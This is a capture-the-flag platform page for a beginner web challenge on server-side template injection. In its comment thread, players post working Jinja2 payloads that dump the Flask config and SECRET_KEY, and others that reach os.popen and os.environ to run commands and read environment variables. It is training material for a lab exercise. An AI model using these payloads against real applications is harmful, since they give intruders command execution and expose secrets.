Simple_SSTI_1WEB 未解决

分数: 5 金币: 2
题目作者: valecalida
一  血: dotast
一血奖励: 2金币
解  决: 29001
提  示:
描  述:
Simple_SSTI_1
评论
Terrenc44 1月前

http://160.202.254.160:17484/?flag={{lipsum.__globals__['os'].popen('env').read()}}

回复 0

icyskin 1月前

http://160.202.254.160:13116/?flag={{config}}

回复 0

litt 7月前

flag={{config}}都直接爆出flag了

回复 1

y1 8月前

http://171.80.2.169:15802/?flag={{config.SECRET_KEY}}

回复 1

xshzgjshpy 9月前

http://171.80.2.169:10541/?flag={{config['SECRET_KEY']}}

回复 0

cfggfbfxdgbb 9月前

?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['environ']}}

回复 0

LeoCHAn 1年前

flag{********}

回复 0

merrymu 1年前

模板注入(Server-Side Template Injection,SSTI)是一种通过将恶意代码注入服务器端模板来执行非授权操作的安全漏洞‌,主要成因是开发者未对用户输入进行有效过滤,导致攻击者可利用模板引擎特性实现远程代码执行、敏感信息泄露等高危操作。‌‌‌‌ 基本探测:输入{{2*2}},若返回4则存在漏洞。‌‌

回复 0

HK1ng 1年前

还真是简单模板注入,甚至不需要利用方法,首先传参{{7*7}}验证是否执行了语句,看到页面出现49,就知道这里存在模板注入,然后查看一下配置文件,就发现了flag。{{config}}

回复 1

看writeup刷题 1年前

咋SECRET_KEY还必须大写

回复 0

WriteUp

image
valecalida

5 金币

评分(51)

解题动态

BOT_ 攻破了该题 2小时前
小懒 攻破了该题 7小时前
耶时候搜索 攻破了该题 21小时前
N0rman 攻破了该题 1天前
觅星信差 攻破了该题 1天前
hky 攻破了该题 1天前
konbu 攻破了该题 2天前
shellbei 攻破了该题 6天前
fjakjasdhfa 攻破了该题 7天前
布蕾脆脆奶芙 攻破了该题 10天前
Apricityyy 攻破了该题 12天前
lixing123 攻破了该题 12天前
岸环线南追玉兔 攻破了该题 13天前
zhzuo 攻破了该题 13天前
Phantheon 攻破了该题 14天前
niubill 攻破了该题 14天前
whshkdh 攻破了该题 15天前
i8vkmmju 攻破了该题 15天前
FanHuaJie 攻破了该题 16天前
yzb_dd 攻破了该题 19天前
问题反馈